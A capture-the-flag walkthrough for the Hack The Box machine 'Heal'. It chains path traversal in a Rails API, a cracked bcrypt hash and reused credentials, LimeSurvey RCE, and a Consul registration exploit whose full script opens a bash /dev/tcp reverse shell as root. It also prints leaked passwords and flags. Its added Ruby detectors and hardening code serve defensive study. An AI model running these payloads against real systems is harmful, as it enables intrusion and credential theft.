HTB Heal Writeup (Walkthrough)
Machine Overview
- Name: Heal
- Difficulty: Medium
- OS: Linux
- IP: 10.10.11.46
Initial Enumeration
Port Scanning
Starting with a standard Nmap scan to identify open ports and running services:
```shell
sudo nmap -sC -sV -oA Heal/Heal 10.10.11.46
```
Results:
- Port 22: SSH (OpenSSH 8.9p1 Ubuntu)
- Port 80: HTTP (Nginx 1.18.0)
- The HTTP title shows a redirect to http://heal.htb/
Added the domain to my hosts file:
```shell
echo "10.10.11.46 heal.htb" | sudo tee -a /etc/hosts
```
Web Enumeration
After exploring the web application at http://heal.htb/, I discovered a JavaScript bundle that referenced a separate API host (api.heal.htb):
```text
http://heal.htb/static/js/0.chunk.js
```
Added the API subdomain to my hosts file:
```shell
echo "10.10.11.46 api.heal.htb" | sudo tee -a /etc/hosts
```
Accessing the API at http://api.heal.htb/ revealed:
- Rails version: 7.1.4
- Ruby version: 3.3.5
Directory enumeration using Gobuster on the API:
```shell
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://api.heal.htb/
```
Results:
- /download (Status: 401)
- /profile (Status: 401)
- /resume (Status: 401)
Exploitation Path 1: API File Inclusion
Account Creation and Authentication
- Created an account on the main website
- Logged in to access the resume creation feature
- Used Burp Suite to intercept the “export as PDF” functionality
The intercepted export request showed that the API's /download endpoint takes a client-controlled filename parameter, a strong sign of a Local File Inclusion (LFI) / path traversal issue (the browser's CORS preflight is shown here):
```http
OPTIONS /download?filename=etc/passwd HTTP/1.1
Host: api.heal.htb
Accept: */*
Access-Control-Request-Method: GET
Access-Control-Request-Headers: authorization
Origin: http://heal.htb
```
Exploiting the LFI
Successfully accessed /etc/passwd through this vulnerability:
```http
GET /download?filename=etc/passwd HTTP/1.1
Host: api.heal.htb
Authorization: Bearer [JWT-TOKEN]
```
From the /etc/passwd contents, I identified two user accounts:
- ralph
- ron
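The requests above leave a clear trace in the API's web server access log. As an added detection example (not part of the original writeup), the Ruby snippet below parses constructed nginx-style log lines and flags /download requests whose filename parameter contains traversal segments, an absolute path, or a well-known sensitive file name; the log lines, hostnames and timestamps are all made up for the example.

```ruby
require "cgi"

# Constructed access-log lines in nginx "combined"-like format (sample data, not from the machine).
SAMPLE_LOG = <<~LOG
  10.10.14.5 - - [12/Jan/2025:10:01:02 +0000] "GET /download?filename=resume_ralph.pdf HTTP/1.1" 200 5120
  10.10.14.5 - - [12/Jan/2025:10:01:09 +0000] "GET /download?filename=etc/passwd HTTP/1.1" 200 2048
  10.10.14.5 - - [12/Jan/2025:10:01:15 +0000] "GET /download?filename=../../config/database.yml HTTP/1.1" 200 610
  10.10.14.5 - - [12/Jan/2025:10:01:20 +0000] "GET /download?filename=..%2F..%2F..%2Fstorage/development.sqlite3 HTTP/1.1" 200 40960
  10.10.14.9 - - [12/Jan/2025:10:02:00 +0000] "GET /profile HTTP/1.1" 401 0
LOG

# Minimal parser for the fields we need: client IP, timestamp, request path, status.
LOG_RE = /^(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<path>\S+) [^"]*" (?<status>\d{3}) (?<bytes>\d+)/

# File names that should never be served by a resume-download endpoint.
SENSITIVE_MARKERS = %w[etc/passwd database.yml .sqlite3 .env credentials.yml.enc master.key]

# True when a request path is a /download call whose filename escapes the
# intended directory or names a sensitive file.
def suspicious_download?(path)
  uri_path, query = path.split("?", 2)
  return false unless uri_path == "/download" && query

  name = CGI.parse(query)["filename"].first
  return false if name.nil?

  # CGI.parse already decodes once; decode again so a double-encoded "../" is caught too.
  decoded = CGI.unescape(CGI.unescape(name))
  decoded.include?("../") ||
    decoded.start_with?("/") ||
    SENSITIVE_MARKERS.any? { |marker| decoded.include?(marker) }
end

# Returns one hash per suspicious request: who, when, what, and whether it succeeded.
def find_traversal_attempts(log_text)
  log_text.each_line.filter_map do |line|
    m = LOG_RE.match(line) or next
    next unless suspicious_download?(m[:path])
    { ip: m[:ip], time: m[:ts], path: m[:path], status: m[:status].to_i }
  end
end

if __FILE__ == $PROGRAM_NAME
  find_traversal_attempts(SAMPLE_LOG).each do |hit|
    puts "#{hit[:time]} #{hit[:ip]} status=#{hit[:status]} #{hit[:path]}"
  end
end
```

A status of 200 on a flagged request is the important signal: it means the file was actually returned, not merely requested, so those entries are the ones to escalate.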
Further File Enumeration
Since the API was running on Ruby on Rails, I targeted its configuration files and found the database configuration file:
```http
GET /download?filename=../../config/database.yml HTTP/1.1
```
This revealed SQLite was being used:
```yaml
production:
  <<: *default
  database: storage/development.sqlite3
```
Downloaded the SQLite database file:
```http
GET /download?filename=../../../storage/development.sqlite3 HTTP/1.1
```
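The endpoint's controller code is not shown on the page, so the following is an added illustration (not the machine's actual code) of the vulnerable shape beside a hardened one, in Ruby since the API is Rails. The storage directory `/srv/heal/resumes` and both function names are assumptions for the example. The hardened resolver accepts only a bare file name, rejects `.`/`..`, NUL bytes and a leading `~` (which `File.expand_path` would expand to a home directory), and confirms the final path still lies under the storage root before anything like `send_file` is called.

```ruby
# Assumed storage directory for generated resumes (not from the page).
RESUME_ROOT = "/srv/heal/resumes"

# Vulnerable shape: the client-supplied name is resolved relative to the storage
# directory with no validation, so "../" segments walk straight out of it.
# In a controller this would typically end in `send_file` on the returned path.
def resolve_download_unsafe(requested, root = RESUME_ROOT)
  File.expand_path(requested, root)   # "../../config/database.yml" -> "/srv/config/database.yml"
end

# Hardened resolver: returns the absolute path to serve, or nil when the request
# must be refused. Rejecting is safer than "cleaning" the name.
def resolve_download(requested, root = RESUME_ROOT)
  return nil if requested.nil? || requested.empty?
  return nil if requested.include?("\0")          # NUL would truncate the path in C-level calls

  # Accept a bare basename only: any directory component, absolute path or
  # traversal sequence changes the basename and is rejected outright.
  name = File.basename(requested)
  return nil unless name == requested
  return nil if name == "." || name == ".."
  return nil if name.start_with?("~")              # File.expand_path expands "~user" to a home directory

  candidate = File.expand_path(name, root)
  # Belt and braces: even after the checks above, insist the result stays under root.
  return nil unless candidate.start_with?(root + File::SEPARATOR)
  candidate
end

if __FILE__ == $PROGRAM_NAME
  ["resume.pdf", "etc/passwd", "../../config/database.yml", "/etc/passwd"].each do |req|
    puts "#{req.inspect} -> unsafe: #{resolve_download_unsafe(req)} | hardened: #{resolve_download(req).inspect}"
  end
end
```

Note that even the hardened version only controls *which directory* is served; whether the caller is allowed to see that particular resume is a separate authorization check (the `Authorization: Bearer` token in the original requests), and both are needed.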
Credential Extraction
Found bcrypt password hashes in the users table, including one for [email protected]:
```text
[email protected]:$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG
```
Cracked the hash using John the Ripper:
```shell
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt
```
Credentials obtained:
```text
[email protected]:147258369
```
Exploitation Path 2: LimeSurvey
Survey Application Discovery
Accessed the “Take the Survey” feature on the main site, which led to:
```text
http://take-survey.heal.htb
```
Added this subdomain to my hosts file:
```shell
echo "10.10.11.46 take-survey.heal.htb" | sudo tee -a /etc/hosts
```
Directory enumeration uncovered an admin interface:
```shell
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://take-survey.heal.htb/
```
Results:
- /docs (Status: 301)
- /themes (Status: 301)
- /modules (Status: 301)
- /admin (Status: 301)
- /assets (Status: 301)
- /upload (Status: 301)
- /plugins (Status: 301)
LimeSurvey Admin Access
The credentials recovered from the API database were reused here, and I logged in to the admin interface with them:
```text
http://take-survey.heal.htb/admin
ralph:147258369
```
Identified the application as LimeSurvey Community Edition Version 6.6.4, with a known vulnerability CVE-2021-44967.
RCE Exploitation
Used a public exploit for LimeSurvey:
```shell
python3 ./exploit.py http://take-survey.heal.htb ralph 147258369 80
```
Gained initial shell access as www-data:
```text
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Privilege Escalation
Internal Service Enumeration
After gaining shell access, I listed the listening sockets to find internal services:
```shell
ss -tuln
```
Found multiple services running on localhost, including:
- PostgreSQL (port 5432)
- HashiCorp Consul (ports 8300-8302, 8500, 8600)
- Other internal services (ports 3000, 3001)
Database Credentials
Located the LimeSurvey configuration file:
```shell
cat /var/www/limesurvey/application/config/config.php
```
Retrieved PostgreSQL credentials:
```text
username: db_user
password: AdmiDi0_pA$$w0rd
```
Consul Exploitation
The Consul agent HTTP API on port 8500 accepted service registrations without any ACL token, and the health check attached to a registered service can execute an arbitrary command as the user running Consul (root on this box):
1. Used a public exploit that registers a service whose health check spawns a reverse shell (the original exploit header and code, with the garbled quoting repaired):
```python
# Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution (RCE)
# Date: 26/10/2022
# Exploit Author: GatoGamer1155, 0bfxgh0st
# Vendor Homepage: https://www.consul.io/
# Description: Exploit for gain reverse shell on Remote Command Execution via API
# References: https://www.consul.io/api/agent/service.html
# Tested on: Ubuntu Server
# Software Link: https://github.com/hashicorp/consul

import requests, sys

# Arguments: target host, Consul HTTP port, listener host, listener port, ACL token
if len(sys.argv) < 6:
    print(f"\n[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} <rhost> <rport> <lhost> <lport> <acl_token>\n")
    sys.exit(1)

# Service registration endpoint of the agent HTTP API
target = f"http://{sys.argv[1]}:{sys.argv[2]}/v1/agent/service/register"
headers = {"X-Consul-Token": f"{sys.argv[5]}"}

# The registered service carries a script health check; the agent runs the
# check command, which is what yields the shell.
json = {
    "Address": "127.0.0.1",
    "check": {
        "Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{sys.argv[3]}/{sys.argv[4]} 0>&1"],
        "interval": "10s",
        "Timeout": "864000s",
    },
    "ID": "gato",
    "Name": "gato",
    "Port": 80,
}

try:
    requests.put(target, headers=headers, json=json)
    print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")
except Exception:
    print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")
```
2. Received a reverse shell with root privileges:
```text
uid=0(root) gid=0(root) groups=0(root)
```
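The root cause here is agent configuration rather than a software bug: script checks submitted through the HTTP API run with the agent's privileges, so they must be disabled (or limited to file-defined checks) and the API must require an ACL token. As an added example (not part of the original writeup), the Ruby snippet below audits a Consul agent configuration in JSON form and reports the settings that made the registration attack possible; both configuration documents are constructed for the example and are not the machine's real files, and `audit_consul_agent` is an assumed helper name. The keys checked (`enable_script_checks`, `enable_local_script_checks`, `acl.enabled`, `acl.default_policy`, `client_addr`) are real Consul agent options.

```ruby
require "json"

# Constructed agent config that allows the attack: script checks are enabled
# and no ACL system is configured, so any caller of the local API can register
# a service with a command-running health check.
WEAK_AGENT_CONFIG = <<~JSON
  {
    "datacenter": "dc1",
    "server": true,
    "client_addr": "127.0.0.1",
    "enable_script_checks": true
  }
JSON

# Constructed hardened config: API-submitted script checks are off, checks
# defined in local config files are still allowed, and ACLs default to deny.
HARDENED_AGENT_CONFIG = <<~JSON
  {
    "datacenter": "dc1",
    "server": true,
    "client_addr": "127.0.0.1",
    "enable_script_checks": false,
    "enable_local_script_checks": true,
    "acl": { "enabled": true, "default_policy": "deny" }
  }
JSON

# Returns a list of human-readable findings; an empty list means no issue found.
def audit_consul_agent(config_json)
  cfg = JSON.parse(config_json)
  findings = []

  if cfg["enable_script_checks"] == true
    findings << "enable_script_checks=true: a caller of /v1/agent/service/register can run an arbitrary " \
                "command as the Consul user via a script check (prefer enable_local_script_checks)"
  end

  acl = cfg.fetch("acl", {})
  if acl["enabled"] != true
    findings << "ACLs disabled: the agent HTTP API accepts service registration without a token"
  elsif acl["default_policy"] != "deny"
    findings << "acl.default_policy is not \"deny\": requests without a token still get broad access"
  end

  addr = cfg["client_addr"]
  if addr && addr != "127.0.0.1" && addr != "localhost"
    findings << "client_addr=#{addr}: the HTTP API is reachable beyond loopback"
  end

  findings
end

if __FILE__ == $PROGRAM_NAME
  { "weak" => WEAK_AGENT_CONFIG, "hardened" => HARDENED_AGENT_CONFIG }.each do |label, cfg|
    puts "#{label}: #{audit_consul_agent(cfg).empty? ? 'no findings' : audit_consul_agent(cfg).join('; ')}"
  end
end
```

Binding the API to loopback, as the weak configuration already does, is not a sufficient boundary on its own: on this box the registration came from a low-privilege shell on the same host, which is exactly the case that ACLs and disabled script checks address.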
Flag Capture
- User flag: 0ba481b1801d7a5cae6ba5a1f2c639a5
- Root flag: 46d2a6d3946282a5177b4b5cdb6bee52
Key Takeaways
- Multiple vulnerability chains were present:
  - LFI in the Rails API leading to credential disclosure
  - Authentication bypass via credential reuse
  - RCE in LimeSurvey via CVE-2021-44967
  - Privilege escalation through the Consul service
- Insecure practices observed:
  - Database credentials stored in cleartext
  - Password reuse across different systems
  - Unpatched software with known vulnerabilities
  - Insecure Consul configuration allowing unauthenticated service registration
Done!